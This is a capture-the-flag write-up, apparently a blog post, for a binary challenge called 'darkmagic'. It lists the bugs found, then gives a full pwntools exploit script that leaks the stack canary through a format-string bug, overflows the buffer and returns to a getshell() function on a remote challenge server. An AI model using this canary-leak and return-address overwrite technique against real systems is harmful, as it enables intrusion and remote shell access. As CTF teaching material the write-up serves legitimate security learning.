Binary
darkmagic
Notes
- BoF in vuln()
- There is stack canary
- no-pie
- for loop that read twice and printf twice
- format string on printf
vuln()
Steps
- Use BoF to override the max_cntr that is 1 to 0xa so that you can read and printf multiple times
- Leak stack canary using format string vuln
- Use BoF to override stack canary with correct value and control pc
- Create ROP that jumps to getshell()
POC
from pwn import *
is_local = False
context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
if is_local:
pty = process.PTY
io = process('pwn_darkmagic_darkmagic', stdin=pty, stdout=pty)
# gdb.attach(io,'''
# b *0x4007eb
# ''')
else:
io = remote("35.234.65.24", 30750)
def send_magic(msg_1: bytes, msg_2: bytes):
io.sendline(msg_1)
io.sendline(msg_2)
# Offset 16
def leak_stack(depth: int = 0x10):
send_magic(b'%p,' * depth,'')
addr_list = io.recvline().split(b',')
io.clean()
for index, addr in enumerate(addr_list):
log.info(f'offset: {index+1} @ {addr}')
io.recvuntil('Dark Magic is here!\n')
# Overwrite the max_cntr varible for forloop in vuln
send_magic(b'A'*100 + b'\x0a\x00\x00\x00', '')
sleep(1)
io.clean()
sleep(1)
send_magic(b'%35$p','')
canary = int(io.recvline()[:-1], 16)
# canary = int(io.recvline()[:-1], 16)
log.info(f'Canary: {hex(canary)}')
io.clean()
sleep(1)
JUNK_2_CANARY = b'A' * 0xd8
CANARY = p64(canary)
JUNK_2_RET = b'A' * 0x8
GETSHELL = p64(0x40073b)
payload_1 = (
b''
+ JUNK_2_CANARY
+ CANARY
+ JUNK_2_RET
+ GETSHELL
)
sleep(1)
send_magic(payload_1, '')
io.interactive()
Like this:
Like Loading...
Related
